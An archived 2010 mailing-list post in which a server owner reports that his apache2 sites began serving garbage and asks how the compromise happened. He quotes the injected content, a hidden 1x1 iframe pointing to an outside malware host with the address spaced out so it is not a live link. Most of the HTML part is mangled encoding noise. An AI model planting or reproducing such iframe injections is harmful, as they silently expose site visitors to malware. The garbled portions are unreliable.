Someone hacked my apache2 server

am 03.04.2010 23:20:21 von Oleg Goryunov

--0016e6dbded802cadd04835bab59
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: base64

SGVsbG8gYWxsLApJdCBsb29rcyBsaWtlIHNvbWVvbmUgaGFja2VkIG15IGFw YWNoZTIgc2VydmVy
IGFuZCBJIGFtIHRyeWluZyB0byB1bmRlcnN0YW5kCmhvdyB0aGlzIGNvdWxk IGhhdmUgaGFwcGVu
ZWQuClRoaXMgaXMgd2hhdCBoYXBwZW5lZDoKQWxsIG9mIGEgc3VkZGVuIHRo ZSBzZXJ2ZXIgLSBp
biByZXNwb25zZSB0byBhIHdlYi1icm93c2VyIHJlcXVlc3QgZm9yIGEgcGFn ZQotIHN0YXJ0ZWQg
dG8gZ2l2ZSBhIGZ1bGwgc2NyZWVuIG9mIHVua25vd24gY2hhcmFjdGVycyAo bG9va2VkIGxpa2Ug
YSBsb25nCnRleHQgd2l0aCBlbmNvZGluZyBtaXNtYXRjaCkuClRoZSBvdXRw dXQgd2FzIGltbWVk
aWF0ZSBhbmQgdGhlIHNhbWUgZm9yIGFsbCB0aGUgd2ViLXNpdGVzIGxvY2F0 ZWQgb24gdGhlCnNl
cnZlci4KTG9va2luZyBhdCB0aGUgcGFnZSBzb3VyY2Ugb2YgdGhlIG91dHB1 dCBJIHNlZSB0aGUg
Zm9sbG93aW5nOgo9PT09PT09PT0KCjxpZnJhbWUgc3JjPSAgaHR0cDovL2Eg eiBzIHggZCBlIDUg
NSAuIDkgOSA2IDYgLiBvcmc6ODgwMC9hazQ3LzI5Lmh0bWwKd2lkdGg9MSBo ZWlnaHQ9MT48L2lm
cmFtZT4g0Jsg77+977+977+977+977+977+9INGNW9GBbuKWiDgg4pag4paM 77+94oiaIFwt4paR
eyDilZjQpiAn4paIJnEg4pSkSSDRiV3ilZnRhOKVpWx74oia0LvQsCTilIwK ZkPQoSpJ4pSY0ZHR
gSDRhtCu0YXQrtGMZijilanQpiA5TuKWky3QvuKVl3DQkOKUgCA54oSWZjjQ rCAg0JfilanQgeKI
mtCj0ZTRg9C74paALl7QodCZTSDilaPCsNGX0YXQq+KVq+KVnyTRiNCU0YHQ l+KUtHEg0K5c0K3Q
oCDQrl7QreKVnAohwqRu0J9caSoKCuKVllxJKuKUrNCB4pWS4paI0JAgIGvi lILCpDDQrOKVkGbi
lozilJjQsNC70Ic44pWd4pWRIG8g0LvQn9CTwqTilavQntC90JzRjCY2ICAg ICAg0J7QltCe4paA
TSrQtDlsQdGJ0Y/RjdGNINCT0JPQs9C94oia4pWZIuKVpOKVm9CwcnwgMOKU mEcK0Lk9ICDQs+KV
lOKVpCAh4pSc0JggRibQqtCdINCg0KLilZDilZFUUOKVkNCd0LDQodGJ4pWe KgpN0K5lSuKWiG4g
IOKVkdCRKeKUgtCk0YDQoCDiiJrQrNGU0YlhICtp0KnilKQgO+KVp1hA4oSW 4pWZYWDilJjQnQpx
0YAg0JknVCBmIHM70Yo80L/RgUjQquKWk+KUnEDQu0hZUyDilaZl4pSsbtCu 0KLQoSBC4pWQWiBc
4pSC4oiZTNGJ0LQ60YTQo1LQudCwT+KVlOKWgOKWhGfilaYg4pWm0L3QuOKV qdGe0Y7ilavQm9Cb
0ZTilabQuyBK0KrilojQmeKVpSDilaVJCuKVqSU34paR0Jog4paIbwoKSNCo 0Jk14pWncH0r0LMK
SeKVmycgYifQnCRz0LDRhTFBfVJB0Kggc+KVlCDQpUk50JDQtFTilaUxS9GR 0LvQqSDilabilaUg
TmMm0KnQp9GCINCvfncgeNCtZ0zQoncq4pWrMSPilZ8g4oiZbNCRXEI6ZSB5 ICDilJzRgiA7CtCn
4pWr4paQLEIgISDilZgyIC7ilZAiIOKVpCkg4pWTXcKwICDilZDilIBhYEBZ NuKVrC3ilLTQjtCQ
0LAg4pSUCtC24pSUMeKVndGJIG0g4pWZQknQruKUlNCp4pWfJzrQtUVrQNCc 0J7QkWfilakgTuKU
nGLilqDRgScg0LZKWdC10JTRiX4y0YA0YUHihJZo4pSk0KjilZFFatCQbSDi lIIuJmPRh9CS0Kkg
ICAgICBj0JBx0KdiU3kK0YzilKxTUNCl4pSAPeKUnNC0ICAgICAgICBS4pSc INC/ROKWjCDQltCV
IG8KCiPQpeKVoNCR4pWQ4pWU0YvRniQg4pWYQHxIKdCnQeKVnCk3TNCvMdCp 0LM5QC/ilZnilagg
ZDhSOiU0Rn3QkCxMNtCsINCcbtCy0KLilJwgUyAkLtC8Tygw4pSM0JBwaOKV nuKVpCAgXNCE4pWk
bOKEliA0I8K3CtCjJ0MuM+KUpCAgICAgINCwTVUi4pWe0IQj0JrQkTjilZI5 0KXilZrilaY+0J/R
hUZH0YomIFTilapq4pSQ0YEgIMK3fiBGWuKImWTvv70wS0ou0Y4gICAgICBi ReKVlNC50YzilZzi
lLxnICAgICAg0YwKOC7ilZ/QvdGC0LPilLTQs+KVpSDilKTRiTlNeNCiMFnQ hFnQjuKWkNGCNNC1
IiDQmjkz0K7ilavQtdC3JWfQvGTQlyBpaSjilpE4INCdMyXilLTQk0NURSDQ utCWeOKUgHTilatv
IEgg0YnilojQliEtINCkXiAgQQrilJgj0JDilZUgdEk5a9CX4paSVU7ilZFt fuKVqdCXOz8g0JB2
IFzilZog4pWfOEvilZDRl2LQpDfQsDVDNOKUguKVo17ilpN6M3jilojQn09f TmPiiJnQn9Cs0K5e
4pSM0Yhk4pWn4oSW0I5hV158eNCv0L/ilLzQktGPSTJgCuKVnOKVnOKUtG5v d9Ge4pSYKOKUjOKU
mOKWkNGJ0Y8k4pWUXiDRjSDilaLiiJrilZTQkksg0LHQliHilIzilaPRlDjQ gdC34pWRV1nQpdCx
UyAg4pS80IHilojRjyDiloBw0LVx0Lcg0IR00YzQk1DQu9Cr0ZQw0YrQnuKI mWhhIDoiViDRgdCz
4pWeaQrilZZaQCBZ0Z7ilqDQlVks0KBgLSBGRTTQrmEuINGRINCWdjDQuCAg 0IcgXtCOZFTRg9GG
4pSsQeKVrD504pWo4pWh4pSYICDQqdCc4pWp0LPilZnRlOKUglcgfdGRK+KW kyBmVVjQl9GecyAg
LXfQslIgRuKWkQriiJnQneKVlTXilpBkIOKWkdCn4pWb4paSCgoKfiDRkVkg 0LLQoiDQsFkgdGxr
0LDRh9C+0K1g4oiaLeKWhCDilLxt0YHQgeKVoCAu4paIICAg4pWj0L3ilIzQ k+KWoHsg0YU/0Yog
IHXRjjRk4pWQ4pSkStCE4pWVLtGC4pWS0YkrcnF5ftCE0YvRkeKVkuKWjOKV keKWhG0gIOKVo9Cs
KgozNWV64pWpYeKWktC60YDQv9GFe9GMI2XRhzrRhT5f4pS00JPRinggIDHC sC/QuzF4UdGJ4pWV
IOKVndCy0KPQtkXQpCwiLmDQveKVntCzXOKVkdC90LxhIEUnWdCH0L7Qq+KV muKWkAouWtGFINCQ
OtGNbC7Qm+KWkHvilILilJjRjtC9YNGDUtCtIOKUgNCsIMKwS+KVqXTilaDQ udGIJGhIIOKUguKV
luKVkSAgLdC04pWa0KosaeKVlNCidtCtIMKk4pWhIkgg0L/Rh8Kk0I7ihJbC sCBM4pWWVzDQnXNj
4pS0IHUgUiUK0Yo04pWqWWbilJw14pWs4pWf0K7QoiwoK3nRlDrQjtCTINGM JeKUguKWkdGJXXdS
JTHRkeKUrNCVLnLilZ4g0YvilZYgIFlS4oiZPH0g4paIINGOINCe4pWV0LTi laUtcSDilZZf4pWp
4pWsezJZ0YXRhuKVleKVlCDilLTilKTRidGA0JEKQStR4pWW4paE4paT0KfC sOKWkHvQl+KVl9GH
0J8KCnfQqEHilLzilaPilZPRjjRS0Z5z4pWgRtC34pWg4pWje+KVmSBr4pWU 0LnRh+KWkTjilZvi
loQg4pag4pWi0KvQkeKUnCPQldC90JHRj+KEln4gb+KVl+KVo9Cr0KTQsCAm MjgKXuKVq0BPfdGD
OuKVqGYgLUHQv9C10KogICAgICDQptCcINCu4pSYa+KVmiDQv9CO4paEe9GJ wrfilZwv4pWWVdGX
0KtxJGHQudC64pWUeNCE0YrRjHzilZAgNSAgMeKWhCDQmCDQr9GU0YbRhnwg IOKUgHfiloRv0Y8g
NArRg9C9Y++/veKVnz/ilZ5kTE0j0LN44pWWbOKUkOKUkErilZbilJDQsErQ q2EK4pWZdirRh9GX
OHh+dtGR0YLRjW93K3bilahcINCfIOKVpWRKISAg4pSCwrfilaBfLNCq4pWr 0KjRitCwIOKVmkvR
gNCkINCTINGMKtGKWeKVpOKVoiBy4pS80Lwx0KE00J04POKVl2th0IHilohD 0ITRl9Cn0J/ilZDi
lavQs0cK0YbRi+KVpOKWjOKImcK3Ik8g0KfilaQg4pSC0ZcgUl/iiJpZ0KAu JiB8ICDQn9C2dFjQ
nkjCsOKUpOKVpMKk0JbQndCQROKWhOKUmNCZINGO4pWVciDCpAoKS1Yk0Kcg ICAgICDilZnQqNC7
V9CdJzh64paS0KDilogg0JZr4pWbWUV44pSc0YV1cERCUtCz0Jg00LNJ0LzR lDQycCTilaLQoyDQ
rdCTINGXwqRm4pWmID4g0JYgPz4gINGLJ2NpINCy4pWrae+/vQrQmdC50Jxh 0YkgftCWViDQok3Q
gTDilanilZ/ilaXilJggKirRlEHilZ4g0KPilpEgI21nRFMu0YbiiJogdtC+ IDLQsdC3WCLQrOKV
pdCT0LBOICvQsdCHPuKImdCx0Yd+INCYO9GeTCAgT9GMPtChcOKVmtC10YLQ kAo4PNC80JPRjNCj
4pagIOKVlyDQnNGPbtGRfDzilajQtF/Qo+KWiHc/4pWn0Yw6WSDiiJlsLdCb INC4U0bilaHQqCBm
YSxWV9GN0JRaV9CQwqTQrNCTLtGN0KzCsF3QpSDiloTRidGB0JzilJwKCtCx 0LjilZ050YHQuSvi
laxCICBBJiDilZQt0Kdu0LRVWOKWknV1INCyRiDQkiApT2TRhArRgSBiNtCp INCla0J50JrQn1Yh
4pWU0KQn4pWgIUTilpFV0KFMQSDilIDQpS8l0JDRl9GHKGTilaDilZHQm3g2 0Yk70K3Qp9C6SNC5
IHPilaNPem7QluKUnEjQo9CB0Ygg4pWq4pSkTCBT0JDQlCggICAgICDQvNC8 CibilZdaM052SuKV
o3Ag0Yho4pWWd+KUrF0g4pWmCiDQoeKWjOKUtOKEluKUkCBp0Y/Rj9CQbSA0 4pSAN9GIYtC1enHi
lZFo0JrQpNCV4pSk4pWcTibilJQtCiAqWDtU0YPQnNChRNGNey7ilaNY4pWf 0LbQmlnilZPRgCBu
Ymds4pWm4pWQReKUgiRTINCj4pWQ0JfRgCBxICAgICAgSyPQmjNG0LE64pWa wrcxICDQlyDRkXHQ
vl3Qn+KWiHLQkCBuOuKWgNCQ4pWoINCr4pWU0JUKO9CbeuKVpjDilZXilak1 0KHilaTQlOKVpFLi
lZwgICAgICDQq3IKCuKUkNCveXk04pSCIOKUrD7ilZrQgdCdKeKVn3vQldCp KNGFNOKVmOKVqCAg
INGFIOKWoCDQoyB80IdZOMKweeKVlnrQh+KUgEAkRCBz4oSW4paS0Lli4paS 0LYx0JPQv9GB4pSC
4pWm0JBQcV/iiJnQo9C9OHEg4pWSaiDilZLilaJC4pWRCuKVodGMPCDilarR jSrQq9CT0JFlINCV
a1R84pSU0Y0gLdCO77+94pS0WiDilZ3ilavilaDiloQ9IDTilZBR4pSc4pWb QNCB4pWYIOKUlNCu
ItCb0J3ilLxMeNCmQeKVqtC14pWe0L0g0YbQvNCSWSDRkUrRhOKVotCq0Ifi lZMg4paS4pWl0YHi
lZvCsArQvNGJ0ITRhuKVpeKVlz5uR35DSChkIuKVktCTY9Cb0KDQtcKk4oSW YSAg4paT4paQICA2
OeKVliAgINCQb1g7d9GGINGLbNGN4pWhcyAgIFnQmEzQqEAgICDilZcg4oia QyBa0Ywg0YAiwrDQ
hNCRUGPQpwphKWfQo2XRhdC0NE5I4pSQICAv4pWQIWPQodCU0LXQoOKUpCDQ ueKVlNCz0KRD0Yog
Ljkr0ZTQq+KUkOKVqiAgICAgINGENVgg0YAgNjzRh+KWkuKUvO+/vdCqJOKV qNGC4pWl4paS0JjQ
odCE4pWlIOKElnXilZ5h0Jx00ITQpV7QgQpXP0vRnuKVljIg0LnQvNCj0YDi lZM00KAgRQoKPT09
PT09PT09PT09PT09PT09ClRoZSBhZGRyZXNzIGluZGljYXRlZCBpbiB0aGUg YmVnaW5pbmcgb2Yg
dGhlIHBhZ2UgY29kZSBsZWFkcyB0byBzb21lIGNoaW5lc2UKc2VydmVyLgoK ClNvLCBzb21laG93
IGl0IGhhcHBlbmVkIHRoYXQgdGhlIG91dHB1dCBvZiB0aGUgYXBhY2hlIHNl cnZlciB3YXMgc3Vi
c3RpdHV0ZWQKYnkgdGhpcyBwYWdlLCB3aGljaCByZWRpcmVjdGVkIHZpc2l0 b3JzIHRvIHNvbWUg
Y2hpbmVzZSBzZXJ2ZXIuIEl0IGlzIHRoZQpzZWNvbmQgdGltZSBJIGFtIHBv c3RpbmcgdG8gdGhl
IG1haWxpbmcgbGlzdCwgdGhlIGZpcnN0IHRpbWUgdGhlIG1haWxpbmcKbGlz dCB2aXJ1cyBzY2Fu
bmVyIGlkZW50aWZpZWQgdGhlIGNvbnRlbnQgYXMgaGF2aW5nIHRoZSBUcm9q L0Z1amlmLUdlbgp2
aXJ1cywgdGh1cywgdGhpcyB0aW1lIEkgcmVtb3ZlZCBhY3RpdmUgbGlua3Mg ZnJvbSB0aGUgbWVz
c2FnZSBib2R5IHNvIGl0IGlzCm5vdCBleGFjdGx5IHdoYXQgSSByZWNlaXZl ZCkuCgpCdXQgdGhl
IG1vc3Qgc3RyYW5nZSB0aGluZyB3YXMgdGhhdCB0aGUgcHJvYmxlbSBkaXNz YXBlYXJlZCBpdHNl
bGYhIFNvLCBpdApsYXN0IGZvciAxMCBtaW51dGVzIHRoZW4gZGlzYXBwZWFy ZWQhIEFuZCB0aGUg
YWdhaW4gc3RhcnRlZCBhbmQgYWdhaW4KZGlzc2FwZWFyZWQuIEZpbmFsbHks IEkgdHVybmVkIGRv
d24gYXBhY2hlIHVudGlsbCBJIHVuZGVyc3RhbmQgd2hhdCBpcyBnb2luZwpv bi4uLgoKQW55IGlk
ZWEgaG93IGNvdWxkIHRoYXQgaGFwcGVuPyAgSG93IHRvIHJlcHJvZHVjZSB0 aGlzPyBIb3cgdG8g
cHJldmVudD8KV2hlcmUgdG8gbG9vayBmb3IgbG9ncz8gSSBoYXZlIGNoZWNr IGJvdGggc3NoIGxv
Z3MgYW5kIGFwYWNoZSBsb2dzLCB0aGVyZSBpcwpub3RoaW5nIHRoYXQgY291 bGQgc2VlbSB1bnVz
dWFsIHRoZXJlLi4uCgpBbnkgaGVscCBpcyBhcHByZWNpYXRlZC4KT2xlZy4K
--0016e6dbded802cadd04835bab59
Content-Type: text/html; charset=UTF-8
Content-Transfer-Encoding: quoted-printable

/Caches/TemporaryItems/msoclip/0/clip_filelist.xml">

>Hello all,

It looks like someone hacked my apache2 server and I am trying to understan=
d
how this could have happened.

This is what happened:

All of a sudden the server - in response to a web-browser request for a pag=
e -
started to give a full screen of unknown characters (looked like a long tex=
t
with encoding mismatch).

The output was immediate and the same for all the web-sites located on the
server.

Looking at the page source of the output I see the following:

=========3D

ly: Courier;"><iframe
src=3DÂ
z s x d e 5 5 . 9 9 6 6 . org:8800/ak47/29.html width=3D1
height=3D1></iframe> amily: "Times New Roman";">Ð 10pt; font-family: Courier;"> family: "Menlo Regular";">ï¿½ï¿½ï¿½ï¿½=EF=
¿½ï¿=BD "> n";">Ñ ;">[ an";">Ñ r;">n man";">â=88 urier;">8 ew Roman";">â â ont-family: "Menlo Regular";">ï¿=BD -size: 10pt; font-family: Courier;">â=9A \- size: 10pt; font-family: "Times New Roman";">â=91 n style=3D"font-size: 10pt; font-family: Courier;">{ font-size: 10pt; font-family: "Times New Roman";">âÐ=A6=
'=
=
â=88&=
;q n";">â=A4 ier;">I Roman";">Ñ urier;">] w Roman";">âÑâ¥ pt; font-family: Courier;">l{â=9A ; font-family: "Times New Roman";">Ð»Ð° =3D"font-size: 10pt; font-family: Courier;">$ e: 10pt; font-family: "Times New Roman";">â=8C tyle=3D"font-size: 10pt; font-family: Courier;">fC t-size: 10pt; font-family: "Times New Roman";">Ð¡ style=3D"font-size: 10pt; font-family: Courier;">*I ont-size: 10pt; font-family: "Times New Roman";">âÑ=91=
Ñ > >ÑÐ®ÑÐ®Ñ family: Courier;">f( ot;Times New Roman";">â©Ð=A6 10pt; font-family: Courier;"> 9N -family: "Times New Roman";">â=93 size: 10pt; font-family: Courier;">- font-family: "Times New Roman";">Ð¾â=97 e=3D"font-size: 10pt; font-family: Courier;">p ze: 10pt; font-family: "Times New Roman";">Ðâ=80=
9â=96f8=
=
Ð¬ tyle=3D"">Â "Times New Roman";">Ðâ©Ð=81 ont-size: 10pt; font-family: Courier;">â=9A size: 10pt; font-family: "Times New Roman";">Ð£ÑÑ=
Ð»â=80 ">.^ an";">Ð¡Ð Courier;">M New Roman";">â=A3 ily: Courier;">Â° uot;Times New Roman";">ÑÑÐ«â«â n style=3D"font-size: 10pt; font-family: Courier;">$ ont-size: 10pt; font-family: "Times New Roman";">ÑÐ=D1=
Ðâ´ er;">q Roman";">Ð® rier;">\ Roman";">ÐÐ ly: Courier;"> mes New Roman";">Ð® ily: Courier;">^ imes New Roman";">Ðâ=9C ; font-family: Courier;">!Â¤n t-family: "Times New Roman";">Ð ze: 10pt; font-family: Courier;">\i*

Â

uot;;">â=96 ;">\I* oman";">â¬ÐââÐ=90 ont-size: 10pt; font-family: Courier;">Â k an> ;">â=82=
Â¤0 Roman";">Ð¬â=90 mily: Courier;">f Times New Roman";">ââÐ°Ð»Ð yle=3D"font-size: 10pt; font-family: Courier;">8 size: 10pt; font-family: "Times New Roman";">ââ span> o style=3D"font-size: 10pt; font-family: "Times New Roman";">=D0=
»ÐÐ=93 ">Â¤ Roman";">â«ÐÐ½ÐÑ=8C size: 10pt; font-family: Courier;">&6Â Â =C2=
Â Â=A0 "Times New Roman";">ÐÐÐâ=80 =3D"font-size: 10pt; font-family: Courier;">M* ze: 10pt; font-family: "Times New Roman";">Ð´ le=3D"font-size: 10pt; font-family: Courier;">9lA -size: 10pt; font-family: "Times New Roman";">ÑÑÑ=
Ñ > >ÐÐÐ³Ð½ : Courier;">â=9A uot;Times New Roman";">â=99 font-family: Courier;">" amily: "Times New Roman";">â¤âÐ° tyle=3D"font-size: 10pt; font-family: Courier;">r| 0 ont-size: 10pt; font-family: "Times New Roman";">â=98=
G e=3D"font-size: 10pt; font-family: "Times New Roman";">Ð¹ an>=3D "">Â Times New Roman";">Ð³ââ¤ size: 10pt; font-family: Courier;"> ! font-family: "Times New Roman";">âÐ=98 le=3D"font-size: 10pt; font-family: Courier;"> F& font-size: 10pt; font-family: "Times New Roman";">ÐªÐ pan> yle=3D"font-size: 10pt; font-family: "Times New Roman";">Ð =
Ð¢ââ Courier;">TP s New Roman";">âÐÐ°Ð¡Ñâ style=3D"font-size: 10pt; font-family: Courier;">*

M quot;;">Ð® >eJ n";">â=88 ier;">nÂ ; font-family: "Times New Roman";">âÐ=91 yle=3D"font-size: 10pt; font-family: Courier;">) size: 10pt; font-family: "Times New Roman";">âÐ¤Ñ=
Ð=A0 =E2=
oman";">Ð¬ÑÑ family: Courier;">a +i quot;Times New Roman";">Ð©â=A4 : 10pt; font-family: Courier;"> ; t-family: "Times New Roman";">â=A7 -size: 10pt; font-family: Courier;">X@â=96 ize: 10pt; font-family: "Times New Roman";">â=99 style=3D"font-size: 10pt; font-family: Courier;">a` ont-size: 10pt; font-family: "Times New Roman";">âÐ=9D<=
/span>

q quot;;">Ñ > ";">Ð ">'T f
s; ";">Ñ ">< oman";">Ð¿Ñ : Courier;">H s New Roman";">Ðªââ : 10pt; font-family: Courier;">@ -family: "Times New Roman";">Ð» e: 10pt; font-family: Courier;">HYS font-family: "Times New Roman";">â=A6 ont-size: 10pt; font-family: Courier;">e pt; font-family: "Times New Roman";">â =3D"font-size: 10pt; font-family: Courier;">n e: 10pt; font-family: "Times New Roman";">Ð®Ð¢Ð¡ n> B le=3D"font-size: 10pt; font-family: "Times New Roman";">â=90=
Z \ an style=3D"font-size: 10pt; font-family: "Times New Roman";">=E2=
â=
=99L an";">ÑÐ´ Courier;">: New Roman";">ÑÐ£ amily: Courier;">R ;Times New Roman";">Ð¹Ð° font-family: Courier;">O : "Times New Roman";">âââ=84 le=3D"font-size: 10pt; font-family: Courier;">g ize: 10pt; font-family: "Times New Roman";">â=A6 style=3D"font-size: 10pt; font-family: Courier;"> nt-size: 10pt; font-family: "Times New Roman";">â¦Ð=BD=
Ð¸â©ÑÑâ«ÐÐÑâ ¦Ð=BB > J e=3D"font-size: 10pt; font-family: "Times New Roman";">Ðª=E2=
Ðâ=A5 urier;"> w Roman";">â=A5 : Courier;"> I es New Roman";">â=A9 amily: Courier;">%7 t;Times New Roman";">âÐ=9A 0pt; font-family: Courier;"> mily: "Times New Roman";">â=88 e: 10pt; font-family: Courier;">o

Â

H quot;;">Ð¨Ð rier;">5 Roman";">â=A7 Courier;">p}+ es New Roman";">Ð³ ly: Courier;">

I quot;;">â=9B r;">' b' imes New Roman";">Ð mily: Courier;">$s ;Times New Roman";">Ð°Ñ font-family: Courier;">1A}RA mily: "Times New Roman";">Ð¨ 10pt; font-family: Courier;"> s family: "Times New Roman";">â=94 ize: 10pt; font-family: Courier;"> ont-family: "Times New Roman";">Ð¥ size: 10pt; font-family: Courier;">I9 font-family: "Times New Roman";">ÐÐ´ =3D"font-size: 10pt; font-family: Courier;">T e: 10pt; font-family: "Times New Roman";">â=A5 tyle=3D"font-size: 10pt; font-family: Courier;">1K t-size: 10pt; font-family: "Times New Roman";">ÑÐ»Ð©=
style=3D"font-size: 10pt; font-family: "Times New Roman";">=E2=
¦â=A5 ">
Nc& Roman";">Ð©Ð§Ñ -family: Courier;"> ot;Times New Roman";">Ð¯ t-family: Courier;">~w x "Times New Roman";">Ð font-family: Courier;">gL y: "Times New Roman";">Ð¢ t; font-family: Courier;">w* ily: "Times New Roman";">â=AB : 10pt; font-family: Courier;">1# t-family: "Times New Roman";">â=9F -size: 10pt; font-family: Courier;"> â=99l ize: 10pt; font-family: "Times New Roman";">Ð yle=3D"font-size: 10pt; font-family: Courier;">\B:e
yÂ -family: "Times New Roman";">âÑ=82 "font-size: 10pt; font-family: Courier;"> ; : 10pt; font-family: "Times New Roman";">Ð§â«â=
,B ! <=
span style=3D"font-size: 10pt; font-family: "Times New Roman";">=
â=982 .<=
/span> ot;;">â=90 ">" w Roman";">â=A4 : Courier;">) es New Roman";">â=93 amily: Courier;">]Â°Â =3D"font-size: 10pt; font-family: "Times New Roman";">â=90=
â=80a`@Y=
6 quot;;">â r;">- man";">â´ÐÐÐ° t; font-family: Courier;"> ly: "Times New Roman";">â=94 10pt; font-family: Courier;">

uot;;">Ð¶â=94 ourier;">1 ew Roman";">âÑ=89 -family: Courier;"> m quot;Times New Roman";">â=99 ; font-family: Courier;">BI ly: "Times New Roman";">Ð®âÐ©â n style=3D"font-size: 10pt; font-family: Courier;">': =3D"font-size: 10pt; font-family: "Times New Roman";">Ðµ n>Ek@ yle=3D"font-size: 10pt; font-family: "Times New Roman";">Ð=
ÐÐg=
uot;;">â=A9 ;"> N man";">â=9C urier;">b w Roman";">â Ñ=81 family: Courier;">' "Times New Roman";">Ð¶ font-family: Courier;">JY y: "Times New Roman";">ÐµÐÑ nt-size: 10pt; font-family: Courier;">~2 pt; font-family: "Times New Roman";">Ñ font-size: 10pt; font-family: Courier;">4aAâ=96h font-size: 10pt; font-family: "Times New Roman";">â¤Ð=A8=
â=91Ej span> t;;">Ðm =
uot;;">â=82 ;">.&c ew Roman";">ÑÐÐ© ont-family: Courier;">Â Â Â Â Â n>c n";">Ð ;">q an";">Ð§ r;"> bSy Roman";">Ñâ amily: Courier;">SP t;Times New Roman";">Ð¥â=80 0pt; font-family: Courier;">=3D family: "Times New Roman";">âÐ=B4 font-size: 10pt; font-family: Courier;"> Â Â =C2=
Â Â=A0 Â R "font-size: 10pt; font-family: "Times New Roman";">â=9C n> e=3D"font-size: 10pt; font-family: "Times New Roman";">Ð¿ an>D le=3D"font-size: 10pt; font-family: "Times New Roman";">â=8C=
style=3D"font-size: 10pt; font-family: "Times New Roman";">=D0=
Ð=95 o r>

Â

# quot;;">Ð¥â ÐââÑÑ=9E le=3D"font-size: 10pt; font-family: Courier;">$ size: 10pt; font-family: "Times New Roman";">â=98 n style=3D"font-size: 10pt; font-family: Courier;">@|H) =3D"font-size: 10pt; font-family: "Times New Roman";">Ð§ n>A e=3D"font-size: 10pt; font-family: "Times New Roman";">â=9C<=
/span>)7L n style=3D"font-size: 10pt; font-family: "Times New Roman";">=D0=
=AF1 pan style=3D"font-size: 10pt; font-family: "Times New Roman";">=
Ð©Ð³9=
@/ ";">ââ¨ ly: Courier;">Â d8R:%4F} ily: "Times New Roman";">Ð 0pt; font-family: Courier;">,L6 family: "Times New Roman";">Ð¬ : 10pt; font-family: Courier;"> -family: "Times New Roman";">Ð e: 10pt; font-family: Courier;">n t-family: "Times New Roman";">Ð²Ð¢â=9C tyle=3D"font-size: 10pt; font-family: Courier;"> S $. font-size: 10pt; font-family: "Times New Roman";">Ð¼ pan style=3D"font-size: 10pt; font-family: Courier;">O(0 =3D"font-size: 10pt; font-family: "Times New Roman";">â=8C=
Ðph n> ">ââ¤ rier;">
Â \ Roman";">Ðâ=A4 mily: Courier;">lâ=96 4#Â· ont-family: "Times New Roman";">Ð£ size: 10pt; font-family: Courier;">'C.3 10pt; font-family: "Times New Roman";">â=A4 le=3D"font-size: 10pt; font-family: Courier;">Â Â =
Â Â Â y: "Times New Roman";">Ð° t; font-family: Courier;">MU" nt-family: "Times New Roman";">âÐ=84 =3D"font-size: 10pt; font-family: Courier;"># e: 10pt; font-family: "Times New Roman";">ÐÐ n style=3D"font-size: 10pt; font-family: Courier;">8 ont-size: 10pt; font-family: "Times New Roman";">â=92=
9 =3D"font-size: 10pt; font-family: "Times New Roman";">Ð¥=E2=
â=A6 ">> oman";">ÐÑ : Courier;">FG es New Roman";">Ñ ly: Courier;">& T uot;Times New Roman";">â=AA font-family: Courier;">j : "Times New Roman";">âÑ=81 ize: 10pt; font-family: Courier;">Â Â·~ FZâ=99d tyle=3D"font-size: 10pt; font-family: "Menlo Regular";">ï¿=BD=
0KJ. pan style=3D"font-size: 10pt; font-family: "Times New Roman";">=
Ñ tyle=3D"">Â Â Â Â Â bE t-size: 10pt; font-family: "Times New Roman";">âÐ¹Ñ=
ââ=BC urier;">gÂ Â Â Â Â n style=3D"font-size: 10pt; font-family: "Times New Roman";">=D1=
=8C8.<=
span style=3D"font-size: 10pt; font-family: "Times New Roman";">=
âÐ½ÑÐ³â´Ð³â=A5 nt-size: 10pt; font-family: Courier;"> t; font-family: "Times New Roman";">â¤Ñ=89 tyle=3D"font-size: 10pt; font-family: Courier;">9Mx nt-size: 10pt; font-family: "Times New Roman";">Ð¢ n style=3D"font-size: 10pt; font-family: Courier;">0Y font-size: 10pt; font-family: "Times New Roman";">Ð pan style=3D"font-size: 10pt; font-family: Courier;">Y "font-size: 10pt; font-family: "Times New Roman";">Ðâ=
Ñ=824 pan> ;;">Ðµ&qu=
ot; an";">Ð r;">93 oman";">Ð®â«ÐµÐ=B7 pt; font-family: Courier;">%g mily: "Times New Roman";">Ð¼ 10pt; font-family: Courier;">d amily: "Times New Roman";">Ð 10pt; font-family: Courier;"> ii( nt-family: "Times New Roman";">â=91 t-size: 10pt; font-family: Courier;">8 t; font-family: "Times New Roman";">Ð ont-size: 10pt; font-family: Courier;">3% 0pt; font-family: "Times New Roman";">â´Ð=93 style=3D"font-size: 10pt; font-family: Courier;">CTE "font-size: 10pt; font-family: "Times New Roman";">ÐºÐ span>x tyle=3D"font-size: 10pt; font-family: "Times New Roman";">â=
=80t pan style=3D"font-size: 10pt; font-family: "Times New Roman";">=
â=ABo H =
uot;;">ÑâÐ=96 ily: Courier;">!- ;Times New Roman";">Ð¤ family: Courier;">^Â A nt-size: 10pt; font-family: "Times New Roman";">â=98<=
span style=3D"font-size: 10pt; font-family: Courier;"># =3D"font-size: 10pt; font-family: "Times New Roman";">Ð=E2=
tI9k span> t;;">Ðâ=92 rier;">UN w Roman";">â=91 : Courier;">m~ es New Roman";">â©Ð=97 font-family: Courier;">;? y: "Times New Roman";">Ð t; font-family: Courier;">v \ mily: "Times New Roman";">â=9A e: 10pt; font-family: Courier;"> t-family: "Times New Roman";">â=9F -size: 10pt; font-family: Courier;">8K ; font-family: "Times New Roman";">âÑ=97 yle=3D"font-size: 10pt; font-family: Courier;">b size: 10pt; font-family: "Times New Roman";">Ð¤ tyle=3D"font-size: 10pt; font-family: Courier;">7 -size: 10pt; font-family: "Times New Roman";">Ð° style=3D"font-size: 10pt; font-family: Courier;">5C4 ont-size: 10pt; font-family: "Times New Roman";">ââ=95=
=A3^ pan style=3D"font-size: 10pt; font-family: "Times New Roman";">=
â=93z3x<=
/span> ot;;">âÐ=9F urier;">O_Ncâ=99 uot;Times New Roman";">ÐÐ¬Ð® ze: 10pt; font-family: Courier;">^ nt-family: "Times New Roman";">âÑ=88 =3D"font-size: 10pt; font-family: Courier;">d e: 10pt; font-family: "Times New Roman";">â=A7 tyle=3D"font-size: 10pt; font-family: Courier;">â=96 =3D"font-size: 10pt; font-family: "Times New Roman";">Ð n>aW^|x style=3D"font-size: 10pt; font-family: "Times New Roman";">Ð¯=
